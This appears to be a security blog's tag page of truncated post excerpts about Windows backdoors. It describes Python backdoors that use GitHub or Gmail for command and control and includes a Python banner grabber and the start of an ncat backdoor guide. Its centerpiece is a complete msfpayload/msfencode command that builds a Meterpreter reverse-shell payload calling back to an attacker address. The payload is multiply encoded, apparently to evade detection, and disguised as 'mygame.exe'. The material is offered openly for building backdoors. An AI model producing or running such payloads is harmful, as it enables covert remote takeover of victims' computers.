Tag: backdoor

Backdoors

A stealthy Python based Windows backdoor that uses Github as a C&C server

CanisRufus is a stealthy Python based Windows backdoor that uses Github as a command and control server. – https://github.com/maldevel/canisrufus The red wolf (Canis rufus or Canis lupus rufus), also known as the Florida wolf or Mississippi Valley wolf, is a canid of unresolved taxonomic identity native to the eastern United States. It is generally, morphologically, …

Backdoors

Gmail Windows backdoor

Gdog is a stealthy Python based Windows backdoor that uses Gmail as a command and control server. This project was inspired by the gcat(https://github.com/byt3bl33d3r/gcat) from @byt3bl33d3r. Requirements Python 2.x PyCrypto module WMI module Enum34 module Netifaces module Features Encrypted transportation messages (AES) + SHA256 hashing Generate computer unique id using system information/characteristics (SHA256 hash) Job …

Python

Banner Grabbing with Python

A simple banner grabber in Python: import optparse from socket import *   def banner(targetHost, targetPort): try: connsocket = socket(AF_INET, SOCK_STREAM) connsocket.connect((targetHost, targetPort)) connsocket.send(’Hi therern’) results = connsocket.recv(100) print ” + str(results) connsocket.close() except: print ‘error’ def main(): options = {} parser = optparse.OptionParser(’usage %prog -H <target host> -P <target port>’) parser.add_option(’-H’, ‘–host’, dest=’target_host’, type=’string’, …

Backdoors, Metasploit

Create crypted Backdoor with Metasploit and Backtrack

We will use windows/meterpreter/reverse_tcp payload. We will encode payload 10 times with shikata_ga_nai and 10 times with call4_dword_xor.   1. Open console window   2. Type: msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t exe -c 10 -o mygame.exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.12 LPORT=1337 R | msfencode …

Backdoors, Netcat

Create Backdoor in Windows with ncat

Let’s see how we can create a non-persistent backdoor in Windows with ncat. We are going to need ncat.exe. Download and install Nmap. Locate ncat.exe in nmap’s installation folder. You will probably find ncat.exe, in this folder x:\Program Files (x86)\Nmap if you have 64bit Windows 7 system as I have. Copy it. It can work …